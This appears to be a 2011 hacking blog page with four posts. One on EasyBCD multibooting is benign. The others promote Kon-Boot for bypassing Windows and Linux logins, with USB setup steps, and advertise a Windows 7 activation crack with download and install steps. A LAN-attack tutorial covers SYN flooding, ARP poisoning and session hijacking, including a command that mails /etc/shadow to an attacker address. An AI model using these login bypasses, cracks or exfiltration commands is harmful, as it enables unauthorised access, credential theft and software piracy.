New Design

Recent Post

Thursday, June 2, 2011
Multibooting From Windows (Multi Boot laoder)

Multibooting From Windows (Multi Boot laoder)

Here You will find a new way to multi Boot into windows or linux or even mac system.
EasyBCD - a powerful bootloader modification tool for windows allows for multibooting
EasyBCD extends and revamps the Windows Bootloader settings.Dual-boot between Windows 7, Windows Vista, older versions of Windows such as XP & 2003, Linux, Ubuntu, BSD, and Mac OS X isSo simple.
EasyBCD has a number of bootloader-related features that can be used to repair and configure the bootloader. EasyBCD also offers a feature to backup and restore the BCD (boot configuration data) configuration files for recovery and testing purposes.In the "Diagnostics Center," it is possible to reset a corrupt BCD storage and automatically create the necessary entries for the current operating system, as well as search for and replace missing/corrupt boot files. Other features can be taken advantage of to install the Windows Vista BCD bootloaderEasyBCD can be used to change the boot drive, rename or change the order of any entries in the bootloader, and modify existing entries to point to a different drive.

  

EasyBCD can boot into Linux and BSD by one of two ways:

    * Chainloading GRUB/LILO/etc.
    * NeoGrub
The traditional chainloading method creates an image of the GRUB/LILO bootsector on the local disk and loads this image during boot-time in order to chainload the second bootloader which should already be configured to boot into Linux or BSD



EasyBCD also ships with NeoGrub, a customized build of Grub for Dos, which can be configured by editing C:\NST\menu.lst with the standard GRUB syntax for booting into the needed Linux or BSD partitions.


EasyBCD can chainload the Mac OS X Darwin bootloader in order to boot into OS X on another partition or physical disk. It doesn't require that Darwin be installed to the bootsector of the OS X partition.

its so simple for booting into linux 
supported Linux Bootloader
  • Grub (Legacy)
  • New Grub2
  • also LILO
So Simple to play with boot loader Settings Now.Download it NOW.. made simple for you......



Monday, May 30, 2011
New Windows And Linux Password Bypassing  Method

New Windows And Linux Password Bypassing Method

By 
CoderLab


It appears that removing Windows And Linux passwords on a machine where you lost the administrator password (or  root password) has become my passion.

Now clearing pasword is not Good in some cases!! Guess Why! . There are various tools to clear windows accounts passwords

But here a new way of bypasswing windows and linux password is given.

This method allows to change contents of a linux kernel (and now Windows kernel also!!!) on the fly (while booting). :) 

 Kon-Boot is probably the fastest and easiest way to remove a Windows & Linux password. All you have to do is insert the Kon-Boot boot CD, and the tool does the rest for you.(a usb bootable method has also discussed at the end.)


Kon-Boot changes the contents of the Windows kernel on the fly while booting allowing you to log on without password. Thus the tool doesn’t change the SAM database. If you reboot again without using Kon-Boot you need the old passwords.I think, this would be the perfect password remove tool for all those desperate computer laymen who want to access their computer as quickly as possible without bothering their heads with terms such as system drive or SAM database.

In the current compilation state it allows to log into a linux system as 'root' user without typing the correct password or toelevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password.

Entire Kon-Boot was written in pure x86 assembly, using old grandpa-geezer TASM 4.0.

Tested Windows versions
Windows Server 2008 Standard SP2 (v.275)
Windows Vista Business SP0
Windows Vista Ultimate SP1
Windows Vista Ultimate SP0
Windows Server 2003 Enterprise
Windows XP
Windows XP SP1
Windows XP SP2
Windows XP SP3
Windows 7


Tested LINUX versions
Kernel
Grub
Gentoo 2.6.24-gentoo-r5
GRUB 0.97
Ubuntu 2.6.24.3-debug
GRUB 0.97
Debian 2.6.18-6-6861
GRUB 0.97
Fedora 2.6.25.9-76.fc9.i6862
GRUB 0.97


Feature
Supported
Disk access filtering (IVT)
Yes
System Address Map fixing for buggy BIOSES ('SMAP' entries)
Yes - basic
Multiple kernel signatures + no hardcoded kernel address
Yes
Deprotecting memory regions
Yes - basic through fixing cr0
Syscalls filtering
Yes
Finding kmalloc()
No - currenty omitted

DOWNLOADS
 
Kon-Boot Windows&Linux
Download

  
Floppy image:
  


CD ISO:      



Just boot the PC with Kon-Boot CD/Floppy, select your profile and put any password ,that’s all.The funny thing is Zipped version of Kon-boot for CD i.e ISO image is 8.5kb (110 kb after extracting ),where as Zipped version for floppy is 10kb which will goes to 1.4mb after unzipping it.


But every body Likes to Boot from Usb Pendrives.Since CDs are hard to put in your pocket, and many machines don't have floppies any more. What I needed was to be able to put Kon-Boot on
 Thumbdrive.

So i have made a new Method to make Kon Boot Bootable from ThumbDrive..

But Actually This utility was not designed to work with USB sticks

I have already explained How to make usb drives bootable Using Unet Boot in 
See My Article IN Live Usb SyStem



Steps To make Kon Boot Bootable

       CoderLabkonbootfiles.Zip      
  • Now extract that files to the root of the thumb drive
  • Boot from the USB . F12 in most Dell Systems, F8 in Asus Motherboards,ESC in  intel Sys.or Simble Go to Bios (Press DEL During Startup) and change the boot priority to "Boot from Usb".
  • When the syslinux menu comes up, choose "1st Kon-Boot" first and step through it.
  • The 2nd time the syslinux menu comes up, choose the option "2nd try boot from drive C: as hd1".
  • 6. If hd1 does not work, try hd2 and so forth until you get in. If you have a a multi-boot system you may get a boot error, but it still worked for me.
    7. On Linux login as kon-usr at the terminal (not GDM/KDM/XDM). On Windows use any valid local user name and a blank password (or even SASI, !!!!anything you type in as a password seems to work).
      
  • Thats all  ENJOY!!!!!!!!


Saturday, May 14, 2011
New Windows 7 Loader (Activation Crack)

New Windows 7 Loader (Activation Crack)

BY
Coder Lab





Activator Highlights
--------------------
- This activator works with all versions.
- Tested and working on both x86 and x64.
- Works in Virtual Environment.
- Works with dual-boot
- No key is needed for install or activation.
- The activation adds the OEM master key for you.
- "OEM" Brand is left up to end-user.
- No BIOS modification needed.
- It has no text during boot. (Vista activators had this)
- Uses OEM SLP method.
- Supports SLIC and non-SLIC enabled BIOS.
- Emulate a SLIC 2.1 enabled BIOS on a PC without SLIC 2.1 present...
- User friendly.
- Interface has a G.U.I for interaction.

Installation Tips
-----------------
1. Run the 'Loader' on your Windows Partition
2. Select your desired "OEM" Brand
3. Wait for the pop-up to appear
4. Click "Install Loader"
5. Wait for the pop-up to appear
6. Press "OK" and PC will reboot once complete



                                                              Download LOADER


Monday, May 2, 2011
THREATS ON THE LAN

THREATS ON THE LAN

Communication on LAN basically takes place through protocols like tcp/ip, udp/ip, arp, icmp etc and the most popular of these protocol is tcp/ip.

TCP(Transmission Control Protocol)
      
Data send on the network is in form of packets which contain information about source, target and data to be sent. TCP is a protocol developed to make sure that packets are not lost on the network as routers sent them from computer to computer. TCP splits a packet into little pieces, each piece is called a datagram.
A typical datagram looks like this :-

     ETHERNET HEADER
          IP HEADER
        TCP HEADER
              DATA
-->Destination MAC, Source MAC
-->Dest IP, port and Source IP, port
-->SYN,ACK,PSH,RST       
The address of network card is called the MAC address. MAC address is a globally unique and unchangeable address which is stored on the network card itself.  

TCP HEADER FLAGS (that we care about)

  • SYN-->used in initial connection setup
  • ACK-->used to acknowledge received data, makes tcp reliable.
  • PSH--> set when there is data in the packet to pushed up to the application.
  • RST--> signals something horribly wrong (like a closed port), other side must stop sending data.

HOW TCP CONNECTION IS ESTABLISHED

Sending a packet with SYN flag means it’s sender wants to establish a three way TCP/IP connection with the destination system. Let’s understand this in a better way -->
If you are A and the other one is B. You want a connection with B.
A----------------------SYN------------------------>B
B-------------------SYN/ACK-------------------->A
A---------------------ACK------------------------->B
Now the TCP connection is established.

SYN FLOODING

SYN Flooding is an attack in which large no. of SYN packets are sent to the target (victim) by an attacker with a fake IP address such that all the memory of the target gets hogged up in trying to establish a connection with the fake IP address which does not exist in the network.
Effects  

As a result of SYN flooding all the services running on the attacked ports of the target computer are affected .The computer gets busy in sending SYN/ACK packets and is unable to provide service to legitimate users or clients. If an enormously large amount of SYN packets are sent, the target may get hanged or rebooted.

How the attack is done:

Windows is vulnerable to SYN-flood attack
Here is the state of 169.254.0.18 when we flooded it from my computer (169.254.0.20) by fake IP address(169.254.1.21) to the ports 25 and 139.The fake address must have your network ID (as here is it 169.254) and it should be non-existing. You can check its existence by pinging it).

C:\netstat
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    169.254.0.18:25      169.254.0.21:21       SYN_RECEIVED
  TCP    169.254.0.18:139     169.254.0.21:139      SYN_RECEIVED

How to detect SYN Attack

When the Attacker system sends  SYN packet to the client, the client replies by sending SYN/ACK packet and it is waiting to receive an ACK, then the existing connection is said to be in the Half-open connection or client is said to be in the state of SYN_RECIEVED. It is the state, that one can use to detect whether his system is under SYN-floods or not. 

Arp –a: another way to detect SYN attack

In previous attack, the ARP cache of 169.254.0.18 is -->

Interface: 169.254.0.18 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.21          00-00-00-00-00-00     invalid  
  169.254.74.30         00-0c-6e-f1-9e-a3     dynamic  

As shown in the highlighted case, if the connection type is invalid and the MAC address is as shown above, it can be deduced that you are under SYN-floods.

 SPOOFING

Spoofing is a technique to disguise yourself as somebody else which may or may not exist in the network depending upon your choice. It forms the basics of attacking on the network. There are many types of spoofing like ->>

  • IP Spoofing
  • ARP Spoofing
  • DNS Spoofing
In this paper we will be discussing only ARP spoofing.
       
ARP SPOOFING
Any computer connected to the switched network (LAN) has two addresses.
  • MAC Address          
  • IP Address

MAC Address is the network card address and it is fixed. It is essential so that the Ethernet protocol (can be TCP/IP,UDP,FTP etc) can send data back and froth, independent of whatever application protocols are used on top of it. Ethernet builds frames of data and each frame has an Ethernet header, containing the MAC address of the source and the destination computer.
IP address is a virtual address of the computer on the network.

HOW LAN WORKS

When an Ethernet frame is constructed, it must be built from an IP packet. At the time of construction, Ethernet has no idea what is the MAC Address of the destination machine which it needs to create an Ethernet header. The only information it has available is the destination IP from the packet’s header. There must be a way for the Ethernet protocol to find the MAC Address of the destination machine, given a destination IP.

This is where ARP (Address Resolution Protocol) comes into play.

Let us suppose A (169.254.0.1) wants to connect to C (169.254.0.3) then A will generate an “ARP request” packet and broadcast it to all the users on the network inquiring “Is your IP address 169.254.0.3, if so then send your MAC address to me”.

Since the ARP request is sent in a broadcast frame, every Ethernet interface on the network reads it in and hands the ARP request to the networking software running on the
system. Only C with IP address 169.254.0.3 will respond, by sending a packet containing the MAC address of C back to the requesting system. Now A has a MAC address to which it can send data destined for C, and the high-level protocol communication can proceed.
To minimize the number of ARP requests being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it will update its ARP cache with the new IP/MAC association.

IF you want to know the MAC Address of the remote host, just type

C:/>nbtstat  -A   169.254.24.60  OR  nbtstat  –a  chetan

Local Area Connection:
Node IPAddress: [169.254.0.20] Scope Id: []

  NetBIOS Remote Machine Name Table
      Name               Type         Status
      ---------------------------------------------
    CHETAN         <00>  UNIQUE      Registered
    CHETAN         <20>  UNIQUE      Registered
    MSHOME         <00>  GROUP       Registered
    MSHOME         <1E>  GROUP       Registered
    CHETAN         <01>  UNIQUE      Registered
    CHETAN         <03>  UNIQUE      Registered
    C_VERMA        <03>  UNIQUE      Registered
   
   MAC Address = 00-0C-6E-94-0A-BF
HOW A SWITCH WORKS

Frame extracts information about destination IP from IP header of the packet. Frame has no idea about the destination MAC Address because there should be a physical link layer between these two systems.                     
Switch maintains a table which matches switch port numbers to corresponding MAC Addresses. Table is created when switch is powered on by the transferring of first frame through switch port and source MAC Addresses.
Port
MAC
1

2

3


This is the situation when no “ARP request/reply” or data transfer has taken place. Suppose H wants to connect to T1(refer Fig 3), an ARP request is broadcast over the LAN to all current users enquiring “Is your IP X1, if so send me back your MAC
 
Address”. When this is passed through the switch the entry of H’s MAC Address is made in switch’s cache. Now the table will look like


Port
MAC
1

2

3
M3

Obviously T1 responds with an “ARP reply” which is unicast to H which contains its own MAC Address. Moreover ARP cache of T1 will now make an entry of H’s IP address and MAC Address. Hence it sends ARP reply directly to H. As this reply will pass through the switch and port 1 down the cable, the cache of the switch will be updated to.

Port
MAC
1
M1
2

3
M3

When ARP reply reaches the switch then the switch decides which port to send the frame to, comparing it with the destination address of the frame to an internet table which maps the port numbers to MAC Address. Now the frame will send down the cable through the port 3.

HERE IS THE BUG
        
      As ARP is a stateless protocol, most operating systems will update their cache if a reply is received, regardless of whether they have sent an actual request.
We can exploit this bug.

ARP POISIONING

To view your cache you can type arp –a in the command prompt in Windows(& of course in Linux too).
C:/>arp  –a

Interface: 169.254.0.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.3          00-50-ba-8e-ff-e8     dynamic  
  169.254.32.218       00-0b-2b-0d-fb-69     dynamic  
  169.254.105.118      00-50-fc-b0-f3-50     dynamic
  
        • 169.254.0.1--> your IP address
        • 0x1000003-->the code for your interface(in that case eth0)
        • 169.254.0.3-->the IP address of the remote device you are connected                                                  
        • 00-50-ba-8e-ff-e8-->the MAC address of that machine
        • dynamic-->the link type
 
Let's observe the communication between my machine and 169.254.0.3.I got in my arp table its IP and MAC, it has in its arp table my IP and MAC. These values are updated once at 30 secs. If a malicious user sends me a spoofed packet which maps 169.254.0.3 with a non-existent MAC, I won’t be able to communicate with 169.254.0.3 for at least 30 seconds!!. Enough for an attacker to hijack my session. This is called ARP Poisoning.
Now my ARP cache will look like
C:/>arp –a

Interface: 169.254.0.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  169.254.0.3          00-50-ba-4e-ff-e3     invalid
  169.254.32.218       00-0b-2b-0d-fb-69     dynamic  
  169.254.105.118      00-50-fc-b0-f3-50     dynamic
  
ATTACKS

MAC SPOOFING

Obtaining MAC Address of another system without sending your real MAC Address or without entering your real MAC Address in another system ARP cache is MAC Spoofing.
 
AIM -->>>>> H aims to know MAC of A without revealing his real MAC.

H broadcasts an “ARP request” over the network destined to reach A with a fake MAC Address Mf. Now there will be entry of Mf in the cache of switch corresponding to the port of H i.e. 2.Now A will send an “ARP reply” containing his real MAC address to H. When this frame reaches the switch the fake MAC address will be mapped to the port of H i.e. 2 and hence it is delivered to H. Now since the Ethernet card of H is in “promiscuous mode”, where it is allowed to examine frames that are destined for MAC address other than own, there will be entry of A’s real MAC address in H’s ARP cache.
In Linux, promiscuous mode can be enabled-->
# ifconfig eth0 promisc
and to disable it-->
# ifconfig eth0 -promisc

MAN IN MIDDLE ATTACK


Here H will try to insert itself between communication path of T1 and T2. H will forward frames between target computers so that communication is not interrupted.
H poisons ARP cache of T1 and T2 in this way-->
-->H sends a spoofed “ARP reply” to T1 containing T2’s IP with H’s MAC.
-->Also at the same time he sends a spoofed “ARP reply” to T2 containing T1 IP with H’s MAC.
-->Now all T1 and T2 IP traffic will then go to H first instead of directly to each other.
How this attack performs
 As T1 & T2 are communicating with each other, T1’s ARP cache contains T2 IP and MAC address and vice versa. H will poison the cache of T1 & T2. It sends a spoofed “ARP reply” to T1 containing T2’s IP and H’s MAC and to T2, sends T1’s IP and H’s MAC. Now in cache of T1, the IP address of T2 will be associated with the MAC address of H. When T1 want to send a packet it first splits into frames. The frame takes the destination IP from IP header of packet to be sent. It will take the MAC address from the cache. This frame having the IP address of T2 and MAC address of H will be sent to the switch by cable. Now the MAC address of frame will be mapped to the switch’s port number in table i.e. cache of switch and as this port no. is 3 so frame will be sent to H. The same thing will happen in case of T2.Now H will forward the data coming from T1 to T2 and T2 to T1,so that connection between T1 & T2 will not interrupted without any trace.

SOLUTION-->>

To avoid this type of attack T1 should have static entry of T2’s IP and MAC and T2 should have static entry of T1’s IP and MAC in their respective caches.
T1 will make  a static entry of T2 in this way-->
C:/>arp –s X2 M2

Example

an attack on LAN on success

Comp.
Name
IP Address
              OS
            MAC
H
Hacker
169.254.0.1
             Fedora Core(2.4.221.2115.nptl)
00:0c:f1:6b:78:4f
T1
Target 1
169.254.0.2
Windows 2000(Version 5.00.2195)
00:02:44:57: 7c:45
T2
Target 2
169.254.0.3
Windows XP(Version
5.1.2600)
00:50:ba:8f:00:0a


H sends spoofed “ARP reply” to T1 & T2.The ARP cache of T1 and T2 when they were spoofed:

T1:
Interface: 169.254.0.2 --- 0x2
  Internet Address      Physical Address      Type
  169.254.0.3           00-0c-f1-6b-78-4f     dynamic  

·         We can see that in the cache of T1, IP address of T2 corresponds to H’s MAC.

T2:
Interface: 169.254.0.3 on Interface 0x2
  Internet Address      Physical Address      Type
  169.254.0.2           00-0c-f1-6b-78-4f     dynamic  


On hacker’s system, the receiving packets are:

23:42:02.474661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:04.084663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:04.484652 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:06.094662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:06.494660 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:08.104664 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:08.504663 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:10.114661 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

·         When 169.254.0.2 was trying to connect to 169.254.0.3 at the port 25, then the packet was passing through 169.254.0.1 as shown below and hence it proves that 169.254.0.1 is now in between T1 and T2.

23:42:46.294660 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:42:46.694653 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:42:46.705306 169.254.0.2.1163>169.254.0.3.smtp: S 398263844:398263844(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)

·         Also when 169.254.0.3 tried to troubleshoot 169.254.0.2 using ping command, the datagram again passed through 169.254.0.1 as shown below.

23:43:27.254104 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:28.504663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:28.904661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:30.266360 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:30.514657 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:30.914662 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:32.524663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:32.924654 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f
23:43:33.270757 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]
23:43:34.534662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f
23:43:34.935399 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

CHANGING MAC ADDRESS

As we mentioned above that MAC address can’t change but Linux users can change their MAC address without spoofing software, using a single parameter “ifconfig”. We can exploit this-->
# ifconfig eth0 hw ether 00:0c:ff:4f:e8

In Windows2000/XP you can do it by using some softwares like SMAC etc.

This can be exploited as follows:--> H DOS attacks on T2 (refer Fig. 3), then assign himself IP and MAC of T2 receiving all frames from T1 intended for T2.


TCP/IP HIJACKING

Let us suppose A has connected to server B as a root administrator using a TELNET or FTP service. A hacker H who is able to sniff around, will do ARP poisoning A and reset his settings to that of A  and then will be able to issue commands in place of A like “mail hacker_1@greathackers.com</etc/shadow”, it’s enough. The hacker must DOS A with either SYN flooding or ARP poisoning so that A will not be able to interfere in his attack by storming ARP requests.

SOLUTION -->>

Instead of making a telnet login A can SSH (Secured Shell) or SFTP login to avoid TCP/IP hijacking.
Breaking News
Loading...
Quick Message
Press Esc to close
Copyright © 2013 Crack o Hack & tweak STORE All Right Reserved